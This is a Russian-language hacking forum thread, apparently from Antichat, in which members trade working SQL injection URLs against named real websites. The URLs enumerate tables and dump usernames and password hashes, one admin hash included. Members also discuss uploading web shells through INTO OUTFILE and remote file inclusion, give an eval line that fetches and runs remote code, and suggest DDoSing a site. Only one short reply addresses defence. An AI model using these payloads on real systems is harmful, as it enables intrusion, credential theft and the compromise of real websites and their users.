Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет

http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--

Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
Зачем через group_concat? Делай просто через limit по одному.
http://www.rapidshare.ru/909903 - вот тебе список всех таблиц! Самые полезные: user и mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x75736572++-- это колонки таблицы user
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x6d7962625f7573657273 ++-- колонки таблицы mybb_users
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,concat_ws(0x3a,uid,username,passw ord)+from+mybb_users--
1:Admin:5d3fd0aa8e2c38d1b632a1a2d09f46dd - вот логин и пароль из таблицы mybb_users

А где написано, что они должны все выводиться?

Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет

https://forum.antichat.ru/showpost.php?p=1075672&postcount=4940

Есть еще знак > и < и т.д. Лимит не везде доступен при скулях

Pashkela Не понял. Ты отвечал на какой-то мой вопрос?
Если на этот --> А где написано, что они должны все выводиться?
То ответа по ссылке на нашол, да и не стоит беспокоится, вопрос риторический :)
Насчёт лимита:
Там работает лимит, просто скрипт глючит иногда.

как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом,
на вашем же примере если задавать начальные позиции <>0

http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,count(table_name)+from+informatio n_schema.tables+limit+1,1--
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,group_concat(table_name)+from+inf ormation_schema.tables+limit+1,1--
http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,ascii(table_name)+from+informatio n_schema.tables+limit+1,1--
вот ещё 1 пример, вывод есть:
http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+limit+0,1--+
вывода нет
http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+limit+1,1--+
и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '(

как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом
Какой ещё group_concat+limit? Лично я говорил про лимит отдельно, груп конкат отдельно. Возможно не достаточно понятно выразился, извиняйте.
и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '( Я тебе уже говорил, что подзапросы и условия-- это не наш метод, нам нужна кнопка "Залить шелл" :D

===========================
add: кстати о проститутках, их можно группировать :) Например так(разбиваем по базам):

http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--+

При таком раскладе лимит ,разумеется, работает отлично

Ну а не на information_schema, тоже можно групировать по полю, админов там всех вывести и т.д
Типо:
-1+union+select+group_concat(concat_ws(0x2f,user,pa ssword,file_priv)),2,3,4,5,6+from+mysql.user+group +by+file_priv+limit+1,1

Ну и т.д., тоже конечно не панацея, но как вариант покатит

У меня такой вопрос, подобрал например в скуле количество выводимых полей, конструкция такого типа выводит данные -1+group+by+1, но как только делаю union даные не выводятся, вот сылкаhttp://www2.cali.org/index.php?fuseaction=conference.ViewAgenda&eventid=-1+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33/*
Как я понял нужно делать через сабгверю?

(10 символов)
http://www2.cali.org/index.php?fuseaction=conference.ViewAgenda&eventid=-1+union+select+1,group_concat(table_name),0x3a,0x3 a,1,1,1,1,1,1,1,1,1,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33+from+information_sch ema.tables/*

file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!

Как он принимается за пхп,если не обрабатывается интерпретатором,если ток не указано в httpd.conf его обрабатывать как пхп сценарий.Или ты имеешь ввиду,что можно залить любой тхт файл ?

Велемир ты разницу между заливкой и инклудом видишь?

При инклуде расширение не играет роли, любой файл можно включить и он обработается Tigger прав.

Желательно именно *.txt, потому что не всегда можно *.php заливать

Видимо нет =\

http://php.su/functions/?include
http://php.su/functions/?require

Это не заливка, а ВКЛЮЧЕНИЕ

Пытаюсь записать в файл так вот он все проводит норм а пройти запрос куда записать не хочет! Ошибка такого вида

MySQL error: 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/aaa.php\'--' at line 1

Темно-оранжевый - мои ковычки
Серый - то что он не может прочитать

Пробывал и в хексе(0x и т.д.) не получаеться!
Мб кто знает?

diznt, запрос в студию!

http://mial.cs.sfu.ca/newsItem.php?id=-1+union+select+1,0x66726f6d205b2063617368205d20776 8697468206c6f7665202929292929,3,4,5,6,7,8+from+Use r+into+outfile+'/tmp/aaaa.php'--

То что в хексе там текст 'test!' так как чтобы проверить дейстивтельно ли записал он запрос

diznt, запрос в студию!
А зачем он нужен, если и так видно, что ковычки экранируются.

diznt
Путь должен быть в ковычках, в хексе нельзя, в твоём случае залить не получится

add И там даже file_priv N помоему

americanbible.org/absport/news/item.php?id=181'

При подборе вообще не реагирует. в чем дело?

jokester я так и так пробывал конечно))

diznt, шелл можно залить если: 1) Ковычки не экранизируются. 2) Если Linux, то должна читаться (/etc/passwd) (Это я проще объяснил =\). 3) Надо, что бы прав хватило на читалку/найти папку с правами доступными для данного пользователя, которого мы определяем с помощью таблицы mysql.user.

http://www.americanbible.org/absport/news/item.php?id=181' - с чего ты взял, что тут есть скуля?

http://www.americanbible.org/absport/news/item.php?id=181' - с чего ты взял, что тут есть скуля?
А что тут есть?
1064: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near 'union+select+1,2/*'' at line 8

Похоже на хранимую процедуру, скорее всего инъекцию не удастся провести
2) Если Linux, то должна читаться (/etc/passwd)
зачем? не обзяательно, для INTO OUTFILE нужно magic_quotes_gpc=off и полный путь до папки, доступной на запись. Получить этот путь можно разными способами, /etc/passwd может вообще не пригодится.
P.S. что за мода пошла писать ковычки?

americanbible.org/absport/news/item.php?id=181'

При подборе вообще не реагирует. в чем дело?
http://www.americanbible.org/absport/news/item.php?id=181'/**/and/**/if(4=substring(version(),1,1),(select/**/1/**/from/**/ABS_shortcutURLs),1)/*

привет всем. а где можно посоветоваться на счет мобильно6о сата love.wab.ru. я читал сдесь сегодня что в 2007 году разбирали этот сайт- но только на начальной стадии. брат достал уже . лезет туда знакомится а потом пинкоды отсылает. хотелось бы этих его подружек отправить на заслуженый отдых.
P.S в его анкете менял пароль но он заводит новую анкету надоел у матери деньги таскать!!

привет всем. а где можно посоветоваться на счет мобильно6о сата love.wab.ru. я читал сдесь сегодня что в 2007 году разбирали этот сайт- но только на начальной стадии. брат достал уже . лезет туда знакомится а потом пинкоды отсылает. хотелось бы этих его подружек отправить на заслуженый отдых.
P.S в его анкете менял пароль но он заводит новую анкету надоел у матери деньги таскать!!
Душещипательная история =\
Как вариант можешь заDDoSить. Да простят меня модераторы =)

teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+cpg_users--

Блин почему не выводит ничего? =\
Таблица такая сам смотрел и колонка тоже такая

diznt, проверь table_schema. То есть таблица может находится в другой ДБ, то есть имя таблицы будет писаться так. [table_schema].[имя таблица]

teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+cpg_users--

Блин почему не выводит ничего? =\
Таблица такая сам смотрел и колонка тоже такая
Да таблица существует в этой базе данных, но она пустая. Оттуда нечего брать.

Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));

Для cpg_users table_schema=KOLESHEV_1

но

http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+KOLESHEV_1.cpg_users+--+

command denied to user ..

зато можешь посмотреть юзеров форума

http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,concat_ws(0x2F,username,user_ password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+ from+phpbb_users+limit+1,1+--+

ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --

diznt, потому что согласно документации mysql после -- должен идти пробел

А почему вообще ставится ? Это знаки комментария. Нужны для того что-бы обрубить продолжения запроса, когда мы всовываемся в него со своей инъекцией

ElteRUS вопрос
почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
Не думай об этом)) Делай так. Составил запрос. Ошибка? Пробуешь --. не пашет? Пробуешь /*. Не пашет? Пробуешь +--+. Снова не пашет? Ну на кройняк ++-- =))

почему в конце +--+ ставиться? или к примеру -- или /* ? Я просто не понимаю а ставлю --
Все что идёт после этих символов запросом не считается (как // в пхп)

diznt, советую почитать http://forum.antichat.ru/thread43966.html

1. Открывать коммент там и не надо, тк запрос тупо SELECT * FROM news_posts WHERE news_id =$id

2. ElteRUS, доступ к cpg_users есть, просто бд надо писать имя бд прописью, а не капсом
http://teambuilding-extreme.com/news/login.php?id=-1+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19+from+koleshev_1.cpg_users

Для подтверждения:
http://teambuilding-extreme.com/news/login.php?id=1+union+select+1,2,3,concat_ws(0x2F,T ABLE_NAME,TABLE_SCHEMA,database()),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19+from+information_schema.T ABLES+where+TABLE_SCHEMA=database()+AND+TABLE_NAME +like+0x257573657225+limit+3,1

А не выдает ничего, потому что таблица пустая.

Попробуйте у себя на локалхосте выполнить
SELECT 1,2,3 FROM information_schema.VIEWS
все сразу вам понятно станет.

как я понял почитав кусочек статьи "--" это типа обозначение комента (то есть отбрасывает все что после него)

Но зачем он нужен все таки не понятно!

Но зачем он нужен все таки не понятно!
Смотри, может быть запрос вида
SELECT * FROM news_posts WHERE news_id = 1+union+select+1,2,3,4,5 news_name = $name
Если будет такой запрос - мускуль выдаст ошибку, потому что посчитает news_name лишним, а если поставить запрос так
SELECT * FROM news_posts WHERE news_id = 1+union+select+1,2,3,4,5 /* news_name = $nameто news_name = $name считатся не будет.

Это пример =)

Фильтрация таким образом не повличет ли за собой уязвимости?
$style_text = htmlspecialchars(trim($HTTP_POST_VARS['style_text']));
если имеется в виду XSS, то нет. Но если $style_text впоследствии попадает в SQL-запрос, то фильтрация с помощью htmlspecialchars() не спасет от SQL-инъекций. Используй mysql_(real_)*escape_string()

На сервере есть функция:
file_get_contents(./docs/danger $str /body.html) //как то так.
Можно ли как нибудь залить шелл? Имея доступ к $str?

file_get_contents() читает файлы, но не записывает

procedure, попробуй так (не уверен).

$str=");$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')//";
file_get_contents(./docs/danger $str /body.html);

Если не стоит htmlspecialchars, получится вида

file_get_contents(./docs/danger );$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')// /body.html);

procedure, попробуй так (не уверен).

$str=");$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')//";
file_get_contents(./docs/danger $str /body.html);

Если не стоит htmlspecialchars, получится вида

file_get_contents(./docs/danger );$f=fopen('shell.php','a+');fwrite($f,'<? shellcode ?>')// /body.html);
чо, с ума сошёл? :D
оч смешно .. за шутку +5 :D

----

2 procedure
если можно юзать нулевой байт, можно прочитать интересные файлы, в том числе возможно и конф итд .. а там и до шелла недалеко..

конечно это смотря что происходит с этим file_get_contents, если выводится итд, то гут..

procedure
<?php eval(file_get_contents("http://путь.до/шелла/без_символов_открытыя_кода"));?> ?

mailbrush
)))
конечно это смотря что происходит с этим file_get_contents, если выводится итд, то гут..
Все на страницу выводится, параметр get. А где можно прочитать про null байт?

sabe бля сегодня день рождения у webkillá что все ведут себя так? )

%00

просто отрезает то, что после него идет

./docs/danger\0/body.html
- от такая хня получается(

procedure
<?php eval(file_get_contents("http://путь.до/шелла/без_символов_открытыя_кода"));?> ?
а это что ещё???
там что, сказано что этот file_get_contents исполняется? там макс что можно, это прочитать файлы.. если хватит конфигов, да и если вывод есть..